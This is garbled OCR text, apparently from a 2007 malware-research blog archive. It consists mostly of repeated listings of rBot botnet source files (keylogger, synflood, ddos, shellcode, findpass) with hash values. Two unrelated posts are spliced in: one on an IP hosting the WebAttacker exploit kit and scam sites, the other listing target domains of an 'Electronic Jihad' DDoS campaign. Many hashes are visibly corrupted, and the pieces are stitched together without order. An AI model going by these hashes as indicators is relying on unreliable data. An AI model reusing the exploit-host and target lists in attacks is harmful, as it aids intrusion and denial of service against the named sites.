rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb fbo251d2f63ec5c05952e54f900041a42 
rBot.opt 55fd2b809623487fe9d4a3a3f886af64 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
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rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f1l52ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
skysyn.cpp 
ee57eflcc3c9294cadc9096c74720c26 
skysyn.h c7d7710b27cce85f8bdea408945b238c 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
synflood.cpp 
65495819ac28b79aced553dc8fc9d59F 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 


tcpflood.h 
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a9165cc828d623c51c297ec888803d9F 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
8ccb387d3ca3fde76ecffO5dee071d12 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
f16de170fe23839ccf32154d464ea5ff 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
advscan.cpp 
1d994b44bdd7961dcc019ccle4a90bae 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
botkiller.cpp 
f0c6e234812b3d5269528d92c0dd07d5 
botkiller.h 
f295ac974dd51ec105d5e41bf654dd2b 
configs.h 
fd41eb4e5ac2941232001a799aeb8c36 
dcc.cpp 
df6eb61aabd547eal1a37f861a5061505 
dcc.h 
€44c57141c37593156064072bd6570c2 
defines.h 


C7218b48fbe0425baa666dc891535d31 
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download.cpp 
ae8f1b45d00f33fd3e73bef13b8fa726 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
5e666e1886a5501c6df8164d6b31ac74 
fphost.cpp 
38f780e74db3796f6404ff7e46c9ab12 
fphost.h 7269b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp fe0e976ff8513e75f36f7c3760f36014 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
36adc001045103c3fd869c61ab75c768 
includes.h 
93b0ed4e725b8dddf7812cbbfee37248 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
c78da2348f410aeee3d65cd5ae241f0b 
loaddlls.h 
922342107354c1a1f475739fe4f48cf6 
misc.cpp 543acbf089d915d8cb6ad3e224833471 
misc.h 
ec49a854be2c763a8217ce88047de083 
mssql.cpp 
cdd749c5fc949f4417fca6bd2415ed96 
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mssql.h 

91ec31043d9lec5b2ebad48f07blee4d 

net.cpp 

a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
processes.cpp 
d23a779a3ba73974f1699ab600079117 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

rBot.cpp 9b18e17ddd8e658fc9e2b330ef9f86e0 
rBot.dsp ae9c12f9595cc7ef24819755b4605903 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb ff559c5a17d88ac93f0e947a25d69f1c 
rBot.opt c36c9b45493a08edf5e35c270e683741 
rBot.plg 54leb3f348c4ac08a4bf9d071b7b9625 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo 0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479a0cd5cad4f7d 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rndnick.cpp 
90bd87e22c44ecOd0cbf7c62ff3e7a92 

rndnick.h 
1a27a90aafb5e40aa93658c93b97e2ae 
session.cpp 
bae00dd13164894c98928afd0c0acle6 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
sysinfo.cpp 
cl1a679d9924eade44b3aebeaafalc533 
sysinfo.h 
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3.11.14 Scammy Ecosystem (2007-11-14 16:27) 


WE INCREASE 
YOUR REVENUES 


OUR GOAL PARTNERS OIRECTORS 


COMPANY ConractTs> WELCOME TO INVESTMENT COr 


mpany Name: Progold Investments 


’ 
Lg . ’ mMpany rofie: Lnvestment in Prec. 
netals (Gold, Platinum, etc 
- mpaeny abon: HO base Pete 
1K and Estonia 


mpeny 
USA/FlondwG in, EUAIK 
mpany Budget 
sdqget in fis a! yee a 200° 
u nnd «6120 ~«6¢ 
latinum and 900 Kg 9 
Russie clients 197367 
St. Peterburg Liva Tolstago & ; os aed dbs fal priate te peda bail weird — aie 
office 217 Phone jrandchidren continued tis successful business and developed a brand new 
heme o vestments, based on preciou ely There are two ways t vest 
7(812)343-5500 sety-vlhgtey . F 
’ } r funds in Progold Investments: Dwidend reinvestment plan and Direct 
urchese plen 


leinvestime nt Plans 
USA clients 32216.Fiorda ; , ey ir divid nd proc 
2734 Hidden Village Orive mpeny without « 
Jacksonville, office 21 Phone Progold = lavestments 


o1(203)4284533 
Manager ®progold-iny.com 


Manager progold-iny biz 


In this example of a scammy ecosystem, you have a single IP (88.255.90.50) hosting the 
now, retro [1]WebAttacker exploitation kit (inn2coming.com/income/index.php), a viagra scam 
(pctabletshop.hk) on the second parked domain, and an investment banking scams on another 
two - progold-inv.biz; cfinancialservice.com. Now, all they’re missing is a [2]Rock Phish kit 
hosted on it and it would have made it an even more interesting operation to monitor. Of 
course putting more personal efforsts into everything pays off. The same netblock is also host- 
ing such popular downloader’s update locations and live exploit URLs such as statlcount.net; 
alllcount.net; and the recently appeared on the radar mediacount.net (88.255.90.253). 


1. http: //ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 
2. http: //ddanchev. blogspot .com/2007/10/assessing-rock-phish-campaign.htm 
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3c1f3d273e2b87c7051183d18f72d602 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
threads.cpp 
17c45e0fc7cdf3ea6178639ede4868db 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
advscan.obj 
19bdce55e4064b7426f90aab7756cde7 
advscan.sbr 

botkiller.obj 
caOlcf9dda7f8eb914f6b6f922b837d1 
botkiller.sbr 

download.obj 
3b2453bdf439d0a95e74ec025f627789 
download.sbr 

ehandler.obj 
4601e247780383f10130040eafe52f2b 
ehandler.sbr 

fphost.obj 
0eac788ba54a2da88a70496d405610c1 
fphost.sbr 

ftpd.obj 
c58e819e7ddbd46d16596cb6dec59e0b 
ftpd.sbr 

irc send.obj 
04229e7ac566254b2f1f8clcacb2faae 
irc send.sbr 

keylogger.obj 
3b658393615d4b9f2c2c80d3ee80alc8a 
keylogger.sbr 

loaddlls.obj 
1096f42aa34bea82da33d8cb65d2b4e9 
loaddlls.sbr 


misc.obj 
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9a38222a751862c4723f8ed2a35d5699 
misc.sbr 

mssql.obj 
deb64937798a9937a95e48f863fb1008 
mssql.sbr 

net.obj 

81fb0dcfbf4ed190b003af72f20c75b9 

net.sbr 

processes.obj 
a127a05529dbc003fafeO1caadc131e8 
processes.sbr 

rBot.bsc 
10b411328a22e6e095e17deebde484a8 
rBot.map b833beb2ed6021f94ff82052530b6a6c 
rBot.pch cf0b657fd4a010b2f09dc256399f1064 
rBot.pdb 56616101eb959a67b5fab5c796e73675 
rBot.sbr c9771le2eeef470859d1c920e791eedb6c 
rndnick.ob} 
€91304706c27953bbf865ffeab0c20c1 
rndnick.sbr 

session.obj 
5d816c0f7bf2a6b6a50882a7 9dee9FFf3 
session.sbr 

sysinfo.obj 
1e8328f2026a4bbd7293e8c9f290973a 
sysinfo.sbr 

threads.obj 
ab3132bbdf76900a29b9759b3a9a902F 
threads.sbr 

vc60.idb 
c675774aedcc97d89163abb465f0ac72 
advscan.cpp 
7fbe8b8d1bd571917f0fefale1148602 
advscan.h 
c67d944559e747clee795c57fb616d8d 
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aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 


avirus.h e55a156d28fde56a0bb05fc599dafecf 


beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 


beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 


capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 


configs.h 
21dbcb405db832bbce3dedddecee6610 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
Icd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
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dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
7ec56f02c9feb28cc143780c7615cb85 
download.cpp 

664845639 laff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069a6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
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21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1l1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
5b0f25cd550cf9f0a6a30299e9011276 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al9bfb1lfcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
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loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
ac110d58058fb12b6bd64c98c1a66c60 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7¢€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
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e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
6c3d9eaf1d647623e49290e2b09874c7 

optix.h 

3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 

c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 13d989a33e499c25f75b3f2dd86dc30a 
rBot.dsp 9786e259221b150f874e1288577f864e 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 

rBot.ncb 95c99e2d5a53584b01dad0b4692fc8e3 
rBot.opt 78b45b30ad287b616f9927eb39ceef73 
rBot.plg cea5937cc0e1ld76d0deb40ee50485861 
Read Me.txt 
16d9490a78c2ddd51bfc351e66c797cc 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
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remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
7dbe6d69cbbOfff3c57aec3044e7a507 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4féaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99elacO0 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
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78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
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wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
7fbe8b8d1bd571917f0fefale1148602 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
21dbcb405db832bbce3dedddecee6610 
crc32.cpp 


3771c5b3f6992c43c0e12a57c4la727e 
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3.11.15 Electronic Jihad’s Targets List (2007-11-14 17:24) 


free web hosting | free website | laptop computers | shopping cart | php hosting 


There are a lot of ATM 
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Despite the fact that the [1]Electronic Jihad 3.0 campaign was a futile attempt right from 
the very beginning, given the domains that were supposed to synchronize the targets to be 
attacked were down, it’s interesting to try finding out who were they targeting at the first 
place? In the first campaigns, the URLs of the targets, not the victims since they couldn’t scale 
enough to cause even partial damage, were obtainable via the web, compared to the third 
one where they were about to get synchronized. And since the synchronization URLs were 
down before we could take a peek, here are the targets URLs from the [2]first two campaigns. 


First campaign’s targets list : 
gov.il 

keshmesh. net 
meca-love4all.com 
love4all.us 


Second campaign's targets list : 
love4all.us 

islameyat.com 
aldalil-walborhan.com 
rapsaweyat.com 
investigateislam.com 
meca-me.org 
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crc32.h 
lcd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 


dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 


dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 


ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 


ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
7ec56f02c9feb28cc143780c7615cb85 
download.cpp 

664845639 Laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
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7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069ab6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b69b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
5b0f25cd550cf9f0ab6a30299e9011276 


irc send.cpp 
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6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al9bfb1lfcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 


kuang2.h fc3343ecc92dba61f83260bbb93aa70c 


loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
ac110d58058fb12b6bd64c98c1a66c60 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 


misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 


misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 


mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 


net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 


netbios.h 
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dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7¢€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
6c3d9eaf1d647623e49290e2b09874c7 

optix.h 

3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 13d989a33e499c25f75b3f2dd86dc30a 
rBot.dsp 9786e259221b150f874e1288577f864e 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 
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6d17278915220464f9502b8ce5451f67 
rBot.ncb 95c99e2d5a53584b01dad0b4692fc8e3 
rBot.opt 78b45b30ad287b616f9927eb39ceef73 
rBot.plg cea5937ccO0eld76d0deb40ee50485861 
Read Me.txt 
16d9490a78c2ddd51bfc351e66c797cc 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 

35014f60da50aef7b6a7al1 9ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
7dbe6d69cbbOfff3c57aec3044e7a507 

rndnick.h 
3cbe632d4ca6f1l52ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 


11747 


cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99elacO0 
sub7.h 
c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
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6be3f6b1icfecla51673271021f67cab6 
visit.cpp 
27f64f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
Commands.htm 
6759b88dala1217d07134346c9332670 
FSG2.exe O00bd8f44c6176394caf6c018c23ea71b 
help.txt ealb442ecd5010083fa84010152f1d82 
ranges.txt 
7a45dfb6ce389a1662d883c62d5df1 Of 
advscan.cpp 
cd5ac87288d12809fb145d23b2be75e5 
advscan.h 
28d4bb92509606b7f3196d256a9004ec 
aliaslog.cpp 
d4d2c7a728f6232d65c014128564144b 
aliaslog.h 
bcb519a55a26c288ad400e54b432b593 
autostart.cpp 
583e5c04c8a80807353796c2c055580e 
autostart.h 
f90d127bbacbd6e2f3e6caf624cace26 


avirus.cpp 
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15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
fd89d2c8c0aa6f0952801e99f53fesf1 

beagle.h 36acd82182e7db302d6b15elbcf4c15c 
capture.cpp 
2de3c5612c5c823f01a306c43997d098 
capture.h 
7e€2617e52bc0f031a1d883196f00f136 
cdkeys.cpp 
b620757c2ff71c0e339d5d5309c9aeea 
cdkeys.h eb1lfee369b5ff68366424734b445244 
commands.cpp 
f22f2f2282cd22a9c76b5fbb5ffle38e 
commands.h 
5875565af76e40444d865fa22c809197 
configs.h 
4dd04bd5afa8291693cbaf3990f46235 
connect.cpp 
379341715f61324453838e8e990bde5a 
connect.h 
a84b3be9c394e337a790d20e6f70d18d 
crc32.cpp 
517afe6637a2b27999c1761bb236c4cf 
crc32.h 

9704b9d3b7ef22d440caff64c399c4d2 
crypt.cpp 
ea6cb22c6bfaaacb228ada530e219c55 
crypt.h 

1ba014319515b5flflcf7729f27907cf 

dcc.cpp 

ed492dd8bcf7d5822fd3f7 70ff25dce7 

dcc.h 

5d79c86b2096faf3eaf2ac9cabae7 3f7 
dcom.cpp fcfebc37e8ae2209dd878d3e741eb898 
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dcom.h 
af8a531f6dacfd52d472f78df2e7flbd 


ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 


ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
3a7bebbbe58f1907ec91892686ab6aefb 
download.cpp 
18352f7e90670182fb892bddb4030019 
download.h 
ef3afcfc55c043cd6e4793bb63f75c4b 
driveinfo.cpp 
20d0b4a749cf602d214b275cf914d04e 
driveinfo.h 
C472697534896497850e9fc5eb8043ee 
ehandler.cpp 
655dd3d6b9ad46c33062604811af60e9 
ehandler.h 
46dabf2b8d010ea79f080828b68723cd 
externs.h 
57b36798dcd92ad5d45c636f1a38ca35 
findfile.cpp 
f9e4371b95ad85bb687a807e19ab34df 
findfile.h 
b61f99415d6215fb2a82dacc51c2833d 
findpass.cpp 
3cdaa7ee82b6097490f0b04c87eaae63 
findpass.h 
cla5aa8a79fafa5cf7948c744dced355 
fphost.cpp 
